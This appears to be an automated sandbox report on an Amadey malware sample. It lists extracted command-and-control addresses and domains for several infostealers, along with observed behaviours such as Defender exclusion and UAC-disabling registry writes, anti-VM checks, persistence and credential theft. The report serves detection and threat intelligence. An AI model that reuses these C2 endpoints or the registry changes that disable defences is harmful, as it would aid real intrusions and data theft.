amadey | ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926

Analysis

max time kernel
90s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
08-05-2024 13:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
Size

1.7MB
MD5

6bcab686349807f131a92c8fe7a4d736
SHA1

487846c6d51f8df894bb174542a81fd0eb25e1ae
SHA256

ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926
SHA512

94e16b6336a1205cf624f8fcdbb2e32a2e85be93a483d87369e3cd85b12a31f31a908c730709f40a91d0ae6a173554c66229bb44d4ac2295c29073741ce9014a
SSDEEP

49152:haJmLsU7YRCWfNHICNUMjSd2HZmSTI3G/kPdLmas2:haJksZyCiMnk2cVq4

Malware Config

Extracted

Family

amadey

Version

4.20

http://193.233.132.139

Attributes

install_dir
5454e6f062
install_file
explorta.exe
strings_key
c7a869c5ba1d72480093ec207994e2bf
url_paths
/sev56rkm/index.php

rc4.plain

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

185.215.113.67:26260

Extracted

Family

stealc

http://49.13.229.86

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

lumma

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

https://pillowbrocccolipe.shop/api

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 6 IoCs

resource	yara_rule
behavioral2/memory/5744-571-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
behavioral2/files/0x000e000000023c05-616.dat	family_zgrat_v1
behavioral2/memory/5792-664-0x0000000000BE0000-0x0000000000CA0000-memory.dmp	family_zgrat_v1
behavioral2/memory/6004-928-0x0000021C2E2E0000-0x0000021C31B14000-memory.dmp	family_zgrat_v1
behavioral2/memory/6004-929-0x0000021C4C3D0000-0x0000021C4C4DA000-memory.dmp	family_zgrat_v1
behavioral2/memory/6004-933-0x0000021C33910000-0x0000021C33934000-memory.dmp	family_zgrat_v1

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	06AAYpD6tWcJNylgsNUdxSpK.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral2/files/0x000a000000023b9d-107.dat	family_redline
behavioral2/memory/884-121-0x0000000000B80000-0x0000000000BD2000-memory.dmp	family_redline
behavioral2/files/0x000a000000023c01-611.dat	family_redline
behavioral2/files/0x000e000000023c05-616.dat	family_redline
behavioral2/memory/4036-635-0x00000000008F0000-0x0000000000942000-memory.dmp	family_redline
behavioral2/memory/5792-664-0x0000000000BE0000-0x0000000000CA0000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Windows security bypass 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe = "0"	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	06AAYpD6tWcJNylgsNUdxSpK.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bcd327bbad.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	06AAYpD6tWcJNylgsNUdxSpK.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
132	4928	rundll32.exe
187	5208	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 27 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5404	powershell.exe
6060	powershell.exe
5524	powershell.exe
4672	powershell.exe
5764	powershell.exe
6608	powershell.exe
6744	powershell.exe
6764	powershell.exe
5772	powershell.exe
6628	powershell.exe
5400	powershell.exe
1036	powershell.exe
4304	powershell.exe
908	powershell.exe
5200	powershell.exe
680	powershell.exe
6092	powershell.exe
5804	powershell.exe
5828	powershell.exe
4816	powershell.exe
4208	powershell.exe
5164	powershell.exe
6084	powershell.exe
6112	powershell.exe
5864	powershell.EXE
5976	powershell.exe
1308	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
864	netsh.exe
4120	netsh.exe
4004	netsh.exe
2696	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	06AAYpD6tWcJNylgsNUdxSpK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bcd327bbad.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	06AAYpD6tWcJNylgsNUdxSpK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bcd327bbad.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation	da6b67b1f6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation	a79JnNuNzqZp5ApQRi0Y0y5O.exe
Key value queried	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
Key value queried	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation	explorta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation	amert.exe
Key value queried	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation	explorha.exe
Key value queried	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation	file300un.exe

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\txWcMu94NVE01R56Ug8RgipB.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iFSRf2C3lZ3AJjcIoUpXkfFP.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pZFBorYmBuvS6Tw79Wp2IGXY.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8WO3kPQVAYPY9QdxGM9F6LVa.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NNoiAvboZDPZ3bZ7vCsR8W9H.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Qc58KQCoSyL4lj6PLQU3FDcx.bat	regsvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kXZBmdZJWIc5yxSMU4iWM9UO.bat	regsvcs.exe

Executes dropped EXE 28 IoCs

pid	Process
2772	explorta.exe
2208	explorta.exe
2072	amert.exe
4668	explorha.exe
1992	swiiiii.exe
884	jok.exe
4036	swiy.exe
908	file300un.exe
3020	bcd327bbad.exe
1064	gold.exe
944	a79JnNuNzqZp5ApQRi0Y0y5O.exe
744	SctKmdEkHmvBwpXSoPgIH7bV.exe
4236	P8c6wHxJDJzuFl8waXLj8liZ.exe
1792	yR82Qr77psHhbzwPW9LtEJ9J.exe
2104	mdoway0zzKHieiq6eEa8XdGf.exe
4692	da6b67b1f6.exe
5020	uq8.0.exe
5788	explorta.exe
5780	explorha.exe
5472	alexxxxxxxx.exe
4480	06AAYpD6tWcJNylgsNUdxSpK.exe
6008	uq8.1.exe
5792	trf.exe
4036	keks.exe
6956	SctKmdEkHmvBwpXSoPgIH7bV.exe
6976	mdoway0zzKHieiq6eEa8XdGf.exe
6988	P8c6wHxJDJzuFl8waXLj8liZ.exe
6996	yR82Qr77psHhbzwPW9LtEJ9J.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Software\Wine	amert.exe

Loads dropped DLL 5 IoCs

pid	Process
2776	rundll32.exe
4928	rundll32.exe
1000	RegAsm.exe
1000	RegAsm.exe
5208	rundll32.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 49 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/3912-0-0x0000000000020000-0x000000000056F000-memory.dmp	themida
behavioral2/memory/3912-1-0x0000000000020000-0x000000000056F000-memory.dmp	themida
behavioral2/memory/3912-3-0x0000000000020000-0x000000000056F000-memory.dmp	themida
behavioral2/memory/3912-2-0x0000000000020000-0x000000000056F000-memory.dmp	themida
behavioral2/memory/3912-5-0x0000000000020000-0x000000000056F000-memory.dmp	themida
behavioral2/memory/3912-7-0x0000000000020000-0x000000000056F000-memory.dmp	themida
behavioral2/memory/3912-8-0x0000000000020000-0x000000000056F000-memory.dmp	themida
behavioral2/memory/3912-6-0x0000000000020000-0x000000000056F000-memory.dmp	themida
behavioral2/memory/3912-4-0x0000000000020000-0x000000000056F000-memory.dmp	themida
behavioral2/files/0x0002000000022e09-14.dat	themida
behavioral2/memory/3912-20-0x0000000000020000-0x000000000056F000-memory.dmp	themida
behavioral2/memory/2772-23-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2772-26-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2772-27-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2772-29-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2772-28-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2772-25-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2772-24-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2772-22-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2772-30-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2208-33-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2208-35-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2208-40-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2208-39-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2208-38-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2208-36-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2208-34-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2208-37-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2208-32-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2208-42-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2772-43-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2772-46-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/2772-124-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/files/0x0010000000023a0e-199.dat	themida
behavioral2/memory/3020-213-0x0000000000650000-0x0000000000CE3000-memory.dmp	themida
behavioral2/memory/3020-214-0x0000000000650000-0x0000000000CE3000-memory.dmp	themida
behavioral2/memory/3020-215-0x0000000000650000-0x0000000000CE3000-memory.dmp	themida
behavioral2/memory/3020-216-0x0000000000650000-0x0000000000CE3000-memory.dmp	themida
behavioral2/memory/3020-217-0x0000000000650000-0x0000000000CE3000-memory.dmp	themida
behavioral2/memory/3020-218-0x0000000000650000-0x0000000000CE3000-memory.dmp	themida
behavioral2/memory/3020-220-0x0000000000650000-0x0000000000CE3000-memory.dmp	themida
behavioral2/memory/3020-221-0x0000000000650000-0x0000000000CE3000-memory.dmp	themida
behavioral2/memory/3020-219-0x0000000000650000-0x0000000000CE3000-memory.dmp	themida
behavioral2/memory/3020-375-0x0000000000650000-0x0000000000CE3000-memory.dmp	themida
behavioral2/memory/2772-374-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/5788-449-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/memory/5788-500-0x00000000005E0000-0x0000000000B2F000-memory.dmp	themida
behavioral2/files/0x0008000000023c3c-589.dat	themida
behavioral2/memory/4480-604-0x0000000140000000-0x00000001408F4000-memory.dmp	themida

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1"	06AAYpD6tWcJNylgsNUdxSpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	file300un.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	file300un.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe = "0"	file300un.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bcd327bbad.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\bcd327bbad.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\da6b67b1f6.exe = "C:\\Users\\Admin\\1000021002\\da6b67b1f6.exe"	explorta.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 8 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	06AAYpD6tWcJNylgsNUdxSpK.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	bcd327bbad.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
79	pastebin.com
81	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
194	api.myip.com
195	api.myip.com
198	ipinfo.io
199	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000a000000023bb0-380.dat	autoit_exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	06AAYpD6tWcJNylgsNUdxSpK.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	06AAYpD6tWcJNylgsNUdxSpK.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	06AAYpD6tWcJNylgsNUdxSpK.exe
File opened for modification	C:\Windows\System32\GroupPolicy	06AAYpD6tWcJNylgsNUdxSpK.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
2072	amert.exe
4668	explorha.exe
5780	explorha.exe
4480	06AAYpD6tWcJNylgsNUdxSpK.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1992 set thread context of 556	1992	swiiiii.exe	106
PID 4036 set thread context of 1000	4036	swiy.exe	114
PID 1064 set thread context of 1180	1064	gold.exe	119
PID 908 set thread context of 2480	908	file300un.exe	122
PID 5472 set thread context of 5744	5472	alexxxxxxxx.exe	162

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorta.job	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
File created	C:\Windows\Tasks\explorha.job	amert.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2084	sc.exe
2588	sc.exe
6000	sc.exe
5760	sc.exe
5168	sc.exe
6272	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
1168	1992	WerFault.exe	104
6032	5472	WerFault.exe	161
5344	944	WerFault.exe	126

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uq8.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uq8.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	uq8.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3788	schtasks.exe
212	schtasks.exe
5428	schtasks.exe
5688	schtasks.exe
6728	schtasks.exe
2028	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133596474735165333"	chrome.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
